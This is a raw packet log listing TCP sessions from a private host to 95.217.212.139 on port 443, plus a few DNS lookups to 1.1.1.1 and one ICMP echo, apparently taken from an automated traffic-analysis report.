                                                                                                                                                                                                          Apr 10, 2024 08:56:40.907164097 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.907176971 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.907190084 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.908592939 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.995244980 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.995320082 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.995398045 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.995426893 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.995471001 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:40.995492935 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.066119909 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.066183090 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.066217899 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.066241980 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.066277981 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.066277981 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.066306114 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.111018896 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.111067057 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.111124039 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.111129045 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.111172915 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.149996996 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.150021076 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.150096893 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.150110960 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.150147915 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.150166035 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.184453011 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.184499979 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.184609890 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.184609890 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.184631109 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.184686899 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.221052885 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.221096992 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.221163988 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.221180916 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.221218109 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.221237898 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258485079 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258507013 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258620977 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258635998 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.258696079 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.290539026 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.290581942 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.290786028 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.290801048 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.291182041 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.317840099 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.317879915 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.317970037 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.317975044 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.318007946 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.318031073 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336463928 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336483955 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336703062 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336718082 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.336777925 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355647087 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355665922 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355742931 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355756044 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.355808020 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.374977112 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375019073 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375066996 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375078917 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375112057 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.375132084 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392276049 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392338037 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392370939 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392385960 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392414093 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392436028 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392467976 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.392527103 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.393013000 CEST49762443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.393044949 CEST4434976295.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.496515989 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.496579885 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.496692896 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.496994019 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.497018099 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.904500008 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.904620886 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.905266047 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.905294895 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.905519009 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:41.905530930 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541742086 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541863918 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541908026 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541913986 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.541971922 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.542004108 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.542035103 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.542078018 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.630958080 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631027937 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631119967 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631170988 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631206989 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.631237030 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760679007 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760750055 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760837078 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760878086 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760910988 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.760937929 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.854940891 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855005980 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855036974 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855089903 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855123997 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.855146885 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914747000 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914823055 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914871931 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914899111 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914927006 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.914959908 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.915375948 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.915405035 CEST4434976395.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:42.915469885 CEST49763443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109390974 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109428883 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109518051 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109810114 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.109822989 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.516544104 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.516645908 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517256021 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517263889 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517488956 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517494917 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517517090 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:43.517527103 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.317023993 CEST49765443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.317061901 CEST4434976595.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.317135096 CEST49765443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.317341089 CEST49765443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.317348003 CEST4434976595.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.426625013 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.426812887 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.426832914 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.427109957 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.427541018 CEST49764443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.427551985 CEST4434976495.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.717286110 CEST4434976595.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.717403889 CEST49765443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.721699953 CEST49765443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.721712112 CEST4434976595.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.721873045 CEST49765443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:44.721880913 CEST4434976595.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.540308952 CEST4434976595.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.540348053 CEST4434976595.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.540462971 CEST4434976595.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.540941000 CEST49765443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.541460991 CEST49765443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.541484118 CEST4434976595.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.544138908 CEST49766443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.544226885 CEST4434976695.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.544354916 CEST49766443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.544511080 CEST49766443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.544532061 CEST4434976695.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.950485945 CEST4434976695.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.950599909 CEST49766443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.951102972 CEST49766443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.951133013 CEST4434976695.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.951199055 CEST49766443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:45.951209068 CEST4434976695.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.777776957 CEST4434976695.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.777926922 CEST4434976695.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.778028965 CEST49766443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.778028965 CEST49766443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.778155088 CEST49766443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.778196096 CEST4434976695.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.800565958 CEST49767443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.800609112 CEST4434976795.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.800687075 CEST49767443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.800903082 CEST49767443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:46.800924063 CEST4434976795.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:47.206573963 CEST4434976795.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:47.206756115 CEST49767443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:47.207565069 CEST49767443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:47.207592010 CEST4434976795.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:47.207717896 CEST49767443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:47.207725048 CEST4434976795.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.003762007 CEST4434976795.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.003936052 CEST4434976795.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.003954887 CEST49767443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.003993988 CEST49767443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.004792929 CEST49767443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.004812002 CEST4434976795.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.891724110 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.891748905 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.891849041 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.892143011 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:48.892149925 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.295891047 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.296149969 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.296647072 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.296653986 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.296931982 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.296936035 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297039986 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297053099 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297106028 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297111034 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297157049 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297168970 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297260046 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297272921 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297293901 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297298908 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297317028 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297328949 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297378063 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297431946 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297477007 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297554970 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297642946 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:49.297665119 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.928580046 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.928670883 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.928678036 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.928745985 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.929016113 CEST49768443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.929027081 CEST4434976895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.933041096 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.933058023 CEST4434976995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.933145046 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.933417082 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:50.933423996 CEST4434976995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:51.336076021 CEST4434976995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:51.336287022 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:51.336908102 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:51.336916924 CEST4434976995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:51.337075949 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:51.337080956 CEST4434976995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.158545017 CEST4434976995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.158653021 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.158684015 CEST4434976995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.158704996 CEST4434976995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.158741951 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.158768892 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.158956051 CEST49769443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.158970118 CEST4434976995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.160420895 CEST49770443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.160507917 CEST4434977095.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.160613060 CEST49770443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.160990000 CEST49770443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.161022902 CEST4434977095.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.569725990 CEST4434977095.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.569973946 CEST49770443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.570384026 CEST49770443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.570410967 CEST4434977095.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.570554972 CEST49770443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:52.570569038 CEST4434977095.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:53.407949924 CEST4434977095.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:53.408116102 CEST4434977095.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:53.408266068 CEST49770443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:53.408266068 CEST49770443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:53.563417912 CEST49770443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:53.563483953 CEST4434977095.217.212.139192.168.2.4

                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Apr 10, 2024 08:56:05.767522097 CEST6140253192.168.2.41.1.1.1
                                                                                                                                                                                                          Apr 10, 2024 08:56:06.037813902 CEST53614021.1.1.1192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.084978104 CEST5747553192.168.2.41.1.1.1
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.178184032 CEST53574751.1.1.1192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.161106110 CEST5941353192.168.2.41.1.1.1
                                                                                                                                                                                                          Apr 10, 2024 08:56:12.256167889 CEST53594131.1.1.1192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:15.243285894 CEST6431253192.168.2.41.1.1.1
                                                                                                                                                                                                          Apr 10, 2024 08:56:15.336468935 CEST53643121.1.1.1192.168.2.4

                                                                                                                                                                                                          ICMP Packets

                                                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                          Apr 10, 2024 08:56:07.181576967 CEST192.168.2.4172.253.115.1134d5aEcho
